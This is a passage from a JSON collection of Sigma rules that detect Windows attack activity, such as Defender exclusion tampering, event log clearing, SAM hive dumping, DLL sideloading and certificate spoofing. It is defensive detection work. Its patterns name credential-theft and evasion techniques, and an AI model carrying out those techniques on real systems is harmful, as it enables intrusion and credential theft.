Defender\\Exclusions\\'\n    condition: selection\nfalsepositives:\n    - Intended exclusions by administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_windows_defender_exclusions_write_access.yml",
    "content": "title: Windows Defender Exclusion Registry Key - Write Access Requested\nid: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d\nrelated:\n    - id: 46a68649-f218-4f86-aea1-16a759d81820\n      type: derived\n    - id: a33f8808-2812-4373-ae95-8cfb82134978\n      type: derived\nstatus: test\ndescription: |\n    Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/\nauthor: '@BarryShooshooga, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2019-10-26\nmodified: 2023-11-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User'\ndetection:\n    selection:\n        AccessList|contains:\n            - '%%4417' # WriteData\n            - '%%4418' # AppendData\n        EventID:\n            - 4656 # A handle to an object was requested.\n            - 4663 # An attempt was made to access an object.\n        ObjectName|contains: '\\Microsoft\\Windows Defender\\Exclusions\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_wmi_persistence.yml",
    "content": "title: WMI Persistence - Security\nid: f033f3f3-fd24-4995-97d8-a3bb17550a88\nrelated:\n    - id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b\n      type: derived\nstatus: test\ndescription: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.\nreferences:\n    - https://twitter.com/mattifestation/status/899646620148539397\n    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nauthor: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community\ndate: 2017-08-22\nmodified: 2022-11-29\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4662\n        ObjectType: 'WMI Namespace'\n        ObjectName|contains: 'subscription'\n    condition: selection\nfalsepositives:\n    - Unknown (data set is too small; further testing needed)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml",
    "content": "title: T1047 Wmiprvse Wbemcomn DLL Hijack\nid: f6c68d5f-e101-4b86-8c84-7d96851fd65c\nstatus: test\ndescription: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)\ndate: 2020-10-12\nmodified: 2022-02-24\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        RelativeTargetName|endswith: '\\wbem\\wbemcomn.dll'\n    filter:\n        SubjectUserName|endswith: '$'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_workstation_was_locked.yml",
    "content": "title: Locked Workstation\nid: 411742ad-89b0-49cb-a7b0-3971b5c1e0a4\nstatus: stable\ndescription: Detects locked workstation session events that occur automatically after a standard period of inactivity.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2019-03-26\nmodified: 2023-12-11\ntags:\n    - attack.impact\n    # - CSC16\n    # - CSC16.11\n    # - ISO27002-2013 A.9.1.1\n    # - ISO27002-2013 A.9.2.1\n    # - ISO27002-2013 A.9.2.2\n    # - ISO27002-2013 A.9.2.3\n    # - ISO27002-2013 A.9.2.4\n    # - ISO27002-2013 A.9.2.5\n    # - ISO27002-2013 A.9.2.6\n    # - ISO27002-2013 A.9.3.1\n    # - ISO27002-2013 A.9.4.1\n    # - ISO27002-2013 A.9.4.3\n    # - ISO27002-2013 A.11.2.8\n    # - PCI DSS 3.1 7.1\n    # - PCI DSS 3.1 7.2\n    # - PCI DSS 3.1 7.3\n    # - PCI DSS 3.1 8.7\n    # - PCI DSS 3.1 8.8\n    # - NIST CSF 1.1 PR.AC-1\n    # - NIST CSF 1.1 PR.AC-4\n    # - NIST CSF 1.1 PR.AC-6\n    # - NIST CSF 1.1 PR.AC-7\n    # - NIST CSF 1.1 PR.PT-3\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4800\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml",
    "content": "title: Microsoft Defender Blocked from Loading Unsigned DLL\nid: 0b0ea3cc-99c8-4730-9c53-45deee2a4c86\nstatus: test\ndescription: Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL\nreferences:\n    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool\nauthor: Bhabesh Raj\ndate: 2022-08-02\nmodified: 2022-09-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    service: security-mitigations\ndetection:\n    selection:\n        EventID:\n            - 11\n            - 12 # MDE: ExploitGuardNonMicrosoftSignedBlocked\n        ProcessPath|endswith:\n            - '\\MpCmdRun.exe'\n            - '\\NisSrv.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml",
    "content": "title: Unsigned Binary Loaded From Suspicious Location\nid: 8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10\nstatus: test\ndescription: Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations\nreferences:\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-03\nmodified: 2022-09-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    service: security-mitigations\ndetection:\n    selection:\n        EventID:\n            - 11\n            - 12\n        ImageName|contains:\n            - '\\Users\\Public\\'\n            - '\\PerfLogs\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\AppData\\Local\\Temp\\'\n            - 'C:\\Windows\\TEMP\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml",
    "content": "title: HybridConnectionManager Service Running\nid: b55d23e5-6821-44ff-8a6e-67218891e49f\nstatus: test\ndescription: Rule to detect the Hybrid Connection Manager service running on an endpoint.\nreferences:\n    - https://twitter.com/Cyb3rWard0g/status/1381642789369286662\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2021-04-12\nmodified: 2024-08-05\ntags:\n    - attack.persistence\n    - attack.t1554\nlogsource:\n    product: windows\n    service: microsoft-servicebus-client # Change to servicebus-client once validators are up to date\ndetection:\n    selection:\n        EventID:\n            - 40300\n            - 40301\n            - 40302\n    keywords:\n        - 'HybridConnection'\n        - 'sb://'\n        - 'servicebus.windows.net'\n        - 'HybridConnectionManage'\n    condition: selection and keywords\nfalsepositives:\n    - Legitimate use of Hybrid Connection Manager via Azure function apps.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml",
    "content": "title: Suspicious Application Installed\nid: 83c161b6-ca67-4f33-8ad0-644a0737cf07\nstatus: test\ndescription: Detects suspicious application installed by looking at the added shortcut to the app resolver cache\nreferences:\n    - https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: shell-core\ndetection:\n    selection_name:\n        EventID: 28115\n        Name|contains:\n            # Please add more\n            - 'Zenmap'\n            - 'AnyDesk'\n            - 'wireshark'\n            - 'openvpn'\n    selection_packageid:\n        EventID: 28115\n        AppID|contains:\n            # Please add more\n            - 'zenmap.exe'\n            - 'prokzult ad' # AnyDesk\n            - 'wireshark'\n            - 'openvpn'\n    condition: 1 of selection_*\nfalsepositives:\n    - Packages or applications being legitimately used by users or administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml",
    "content": "title: Suspicious Rejected SMB Guest Logon From IP\nid: 71886b70-d7b4-4dbf-acce-87d2ca135262\nstatus: test\ndescription: Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service\nreferences:\n    - https://twitter.com/KevTheHermit/status/1410203844064301056\n    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\n    - https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare\nauthor: Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w\ndate: 2021-06-30\nmodified: 2023-01-02\ntags:\n    - attack.credential-access\n    - attack.t1110.001\nlogsource:\n    product: windows\n    service: smbclient-security\ndetection:\n    selection:\n        EventID: 31017\n        UserName: ''\n        ServerName|startswith: '\\1'\n    condition: selection\nfalsepositives:\n    - Account fallback reasons (after failed login with specific account)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/smbserver/connectivity/win_smbserver_connectivity_unsigned_and_unencrypted_share_connection.yml",
    "content": "title: Unsigned or Unencrypted SMB Connection to Share Established\nid: 8d91f6e4-9f3b-4c21-ae41-2c5b7d9f7a12\nstatus: experimental\ndescription: |\n    Detects SMB server connections to shares without signing or encryption enabled.\n    This could indicate potential lateral movement activity using unsecured SMB shares.\nauthor: Mohamed Abdelghani\ndate: 2025-10-19\nreferences:\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: smbserver-connectivity\ndetection:\n    selection_shares:\n        EventID: 4000\n        ShareName|contains:\n            - 'IPC$'\n            - 'ADMIN$'\n            - 'C$'\n    selection_status:\n        - SigningUsed: 'false'\n        - EncyptionUsed: 'false' # Note: typo in the original event field name\n    filter_main_local_ips:\n        - ClientAddress|cidr:\n              # IPv4\n              # - '10.0.0.0/8'\n              - '127.0.0.0/8'\n              - '169.254.0.0/16'\n              # - '172.16.0.0/12'\n              # - '192.168.0.0/16'\n              # IPv6\n              - '::1/128'  # IPv6 loopback\n              - 'fe80::/10'  # IPv6 link-local addresses\n              - 'fc00::/7'  # IPv6 private addresses\n        # The filters below cover the XML raw log\n        - ClientAddress|contains:\n              # IPv6\n              - '00000000000000000000000000000001' # ::1 - IPv6 loopback\n              - 'FE80000000000000' # fe80:: - IPv6 link-local addresses\n              - 'FC00000000000000' # fc00:: - IPv6 private addresses\n              # IPv4\n              # The \"?\" are meant to represent the port\n              # - '0200????C0A8' # 192.168.\n              # - '0200????AC' # 172.\n              # - '0200????0A' # 10.\n              - '0200????7F' # 127\n              - '0200????A9FE' # 169.254.\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Connections from local or private IP addresses to SMB shares without signing or encryption enabled for older systems or misconfigured environments. Apply additional tuning as needed.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/application_popup/win_system_application_sysmon_crash.yml",
    "content": "title: Sysmon Application Crashed\nid: 4d7f1827-1637-4def-8d8a-fd254f9454df\nstatus: test\ndescription: Detects application popup reporting a failure of the Sysmon service\nreferences:\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36\nauthor: Tim Shelton\ndate: 2022-04-26\nmodified: 2024-01-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Application Popup'\n        EventID: 26\n        Caption:\n            - 'sysmon64.exe - Application Error'\n            - 'sysmon.exe - Application Error'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml",
    "content": "title: NTLMv1 Logon Between Client and Server\nid: e9d4ab66-a532-4ef7-a502-66a9e4a34f5d\nstatus: test\ndescription: Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.\nreferences:\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml\nauthor: Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-04-26\nmodified: 2023-06-06\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1550.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: \"LsaSrv\"\n        EventID:\n            - 6038\n            - 6039\n    condition: selection\nfalsepositives:\n    - Environments that use NTLMv1\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_Iphlpsvc/win_system_isatap_router_address_set.yml",
    "content": "title: ISATAP Router Address Was Set\nid: d22df9cd-2aee-4089-93c7-9dc4eae77f2c\nstatus: experimental\ndescription: |\n    Detects the configuration of a new ISATAP router on a Windows host. While ISATAP is a legitimate Microsoft technology for IPv6 transition, unexpected or unauthorized ISATAP router configurations could indicate a potential IPv6 DNS Takeover attack using tools like mitm6.\n    In such attacks, adversaries advertise themselves as DHCPv6 servers and set malicious ISATAP routers to intercept traffic.\n    This detection should be correlated with network baselines and known legitimate ISATAP deployments in your environment.\nreferences:\n    - https://www.blackhillsinfosec.com/mitm6-strikes-again-the-dark-side-of-ipv6/\n    - https://redfoxsec.com/blog/ipv6-dns-takeover/\n    - https://www.securityhq.com/blog/malicious-isatap-tunneling-unearthed-on-windows-server/\n    - https://medium.com/@ninnesoturan/detecting-ipv6-dns-takeover-a54a6a88be1f\nauthor: hamid\ndate: 2025-10-19\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.collection\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.t1557\n    - attack.t1565.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 4100\n        Provider_Name: 'Microsoft-Windows-Iphlpsvc'\n    filter_main_localhost:\n        IsatapRouter:\n            - '127.0.0.1'\n            - '::1'\n    filter_optional_null:\n        IsatapRouter: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate ISATAP router configuration in enterprise environments\n    - IPv6 transition projects and network infrastructure changes\n    - Network administrators configuring dual-stack networking\n    - Automatic ISATAP configuration in some Windows deployments\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_certification_authority/win_system_adcs_enrollment_request_denied.yml",
    "content": "title: Active Directory Certificate Services Denied Certificate Enrollment Request\nid: 994bfd6d-0a2e-481e-a861-934069fcf5f5\nstatus: test\ndescription: |\n    Detects denied requests by Active Directory Certificate Services.\n    Example of these requests denial include issues with permissions on the certificate template or invalid signatures.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10)\n    - https://www.gradenegger.eu/en/details-of-the-event-with-id-53-of-the-source-microsoft-windows-certificationauthority/\nauthor: '@SerkinValery'\ndate: 2024-03-07\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Microsoft-Windows-CertificationAuthority'\n        EventID: 53\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml",
    "content": "title: DHCP Server Loaded the CallOut DLL\nid: 13fc89a9-971e-4ca6-b9dc-aa53a445bf40\nstatus: test\ndescription: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded\nreferences:\n    - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html\n    - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx\n    - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx\nauthor: Dimitrios Slamaris\ndate: 2017-05-15\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 1033\n        Provider_Name: Microsoft-Windows-DHCP-Server\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml",
    "content": "title: DHCP Server Error Failed Loading the CallOut DLL\nid: 75edd3fd-7146-48e5-9848-3013d7f0282c\nstatus: test\ndescription: This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded\nreferences:\n    - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html\n    - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx\n    - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx\nauthor: 'Dimitrios Slamaris, @atc_project (fix)'\ndate: 2017-05-15\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID:\n            - 1031\n            - 1032\n            - 1034\n        Provider_Name: Microsoft-Windows-DHCP-Server\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml",
    "content": "title: Local Privilege Escalation Indicator TabTip\nid: bc2e25ed-b92b-4daa-b074-b502bdd1982b\nstatus: test\ndescription: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode\nreferences:\n    - https://github.com/antonioCoco/JuicyPotatoNG\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-07\nmodified: 2023-04-14\ntags:\n    - attack.collection\n    - attack.execution\n    - attack.credential-access\n    - attack.t1557.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Microsoft-Windows-DistributedCOM'\n        EventID: 10001\n        param1: 'C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe'  # Binary starting/started\n        param2: 2147943140                                                       # ERROR id\n        param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}'                         # DCOM Server\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml",
    "content": "title: Eventlog Cleared\nid: a62b37e0-45d3-48d9-a517-90c1a1b0186b\nrelated:\n    - id: f2f01843-e7b8-4f95-a35a-d23584476423\n      type: obsolete\n    - id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982\n      type: derived\n    - id: 100ef69e-3327-481c-8e5c-6d80d9507556\n      type: derived\nstatus: test\ndescription: One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution\nreferences:\n    - https://twitter.com/deviouspolack/status/832535435960209408\n    - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-01-10\nmodified: 2023-11-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.001\n    - car.2016-04-002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 104\n        Provider_Name: 'Microsoft-Windows-Eventlog'\n    filter_main_covered:\n        # The channels below are already covered by the rule 100ef69e-3327-481c-8e5c-6d80d9507556\n        Channel:\n            - 'Microsoft-Windows-PowerShell/Operational'\n            - 'Microsoft-Windows-Sysmon/Operational'\n            - 'PowerShellCore/Operational'\n            - 'Security'\n            - 'System'\n            - 'Windows PowerShell'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)\n    - System provisioning (system reset before the golden image creation)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml",
    "content": "title: Important Windows Eventlog Cleared\nid: 100ef69e-3327-481c-8e5c-6d80d9507556\nrelated:\n    - id: a62b37e0-45d3-48d9-a517-90c1a1b0186b\n      type: derived\nstatus: test\ndescription: Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution\nreferences:\n    - https://twitter.com/deviouspolack/status/832535435960209408\n    - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100\nauthor: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-17\nmodified: 2023-11-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.001\n    - car.2016-04-002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 104\n        Provider_Name: 'Microsoft-Windows-Eventlog'\n        Channel:\n            - 'Microsoft-Windows-PowerShell/Operational'\n            - 'Microsoft-Windows-Sysmon/Operational'\n            - 'PowerShellCore/Operational'\n            - 'Security'\n            - 'System'\n            - 'Windows PowerShell'\n    condition: selection\nfalsepositives:\n    - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)\n    - System provisioning (system reset before the golden image creation)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml",
    "content": "title: Certificate Use With No Strong Mapping\nid: 993c2665-e6ef-40e3-a62a-e1a97686af79\nstatus: test\ndescription: |\n    Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID)\n    This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping.\n    Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.\nreferences:\n    - https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16\nauthor: '@br4dy5'\ndate: 2023-10-09\nmodified: 2025-09-22\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name:\n            - 'Kerberos-Key-Distribution-Center'\n            - 'Microsoft-Windows-Kerberos-Key-Distribution-Center'\n        EventID:\n            - 39\n            - 41 # For Windows Server 2008 R2 SP1 and Windows Server 2008 SP2\n    condition: selection\nfalsepositives:\n    - If prevalent in the environment, filter on events where the AccountName and CN of the Subject do not reference the same user\n    - If prevalent in the environment, filter on CNs that end in a dollar sign indicating it is a machine name\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml",
    "content": "title: No Suitable Encryption Key Found For Generating Kerberos Ticket\nid: b1e0b3f5-b62e-41be-886a-daffde446ad4\nstatus: test\ndescription: |\n    Detects errors when a target server doesn't have suitable keys for generating kerberos tickets.\n    This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd348773(v=ws.10)\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/kdc-event-16-27-des-encryption-disabled\nauthor: '@SerkinValery'\ndate: 2024-03-07\nmodified: 2025-09-22\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name:\n            - 'Kerberos-Key-Distribution-Center'\n            - 'Microsoft-Windows-Kerberos-Key-Distribution-Center'\n        EventID:\n            - 16 # KDCEVENT_NO_KEY_INTERSECTION_TGS\n            - 27 # KDCEVENT_UNSUPPORTED_ETYPE_REQUEST_TGS\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_kernel_general/win_system_susp_critical_hive_location_access_bits_cleared.yml",
    "content": "title: Critical Hive In Suspicious Location Access Bits Cleared\nid: 39f919f3-980b-4e6f-a975-8af7e507ef2b\nrelated:\n    - id: 839dd1e8-eda8-4834-8145-01beeee33acd\n      type: obsolete\nstatus: test\ndescription: |\n    Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset.\n    This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default).\n    Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.\nreferences:\n    - https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-15\nmodified: 2024-01-18\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 16\n        Provider_Name: Microsoft-Windows-Kernel-General\n        HiveName|contains:\n            - '\\Temp\\SAM'\n            - '\\Temp\\SECURITY'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_ntfs/win_system_volume_shadow_copy_mount.yml",
    "content": "title: Volume Shadow Copy Mount\nid: f512acbf-e662-4903-843e-97ce4652b740\nstatus: test\ndescription: Detects volume shadow copy mount via Windows event log\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)\ndate: 2020-10-20\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: Microsoft-Windows-Ntfs\n        EventID: 98\n        DeviceName|contains: HarddiskVolumeShadowCopy\n    condition: selection\nfalsepositives:\n    - Legitimate use of volume shadow copy mounts (backups maybe).\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_wer_systemerrorreporting/win_system_crash_dump_created.yml",
    "content": "title: Crash Dump Created By Operating System\nid: 882fbe50-d8d7-4e29-ae80-0648a8556866\nrelated:\n    - id: 2ff692c2-4594-41ec-8fcb-46587de769e0\n      type: similar\nstatus: experimental\ndescription: Detects \"BugCheck\" errors indicating the system rebooted due to a crash, capturing the bugcheck code, dump file path, and report ID.\nreferences:\n    - https://www.sans.edu/cyber-research/from-crash-compromise-unlocking-potential-windows-crash-dumps-offensive-security/\n    - https://jasonmull.com/articles/offensive/2025-05-12-windows-crash-dumps-offensive-security/\nauthor: Jason Mull\ndate: 2025-05-12\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1003.002\n    - attack.t1005\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Microsoft-Windows-WER-SystemErrorReporting'\n        EventID: 1001\n    condition: selection\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml",
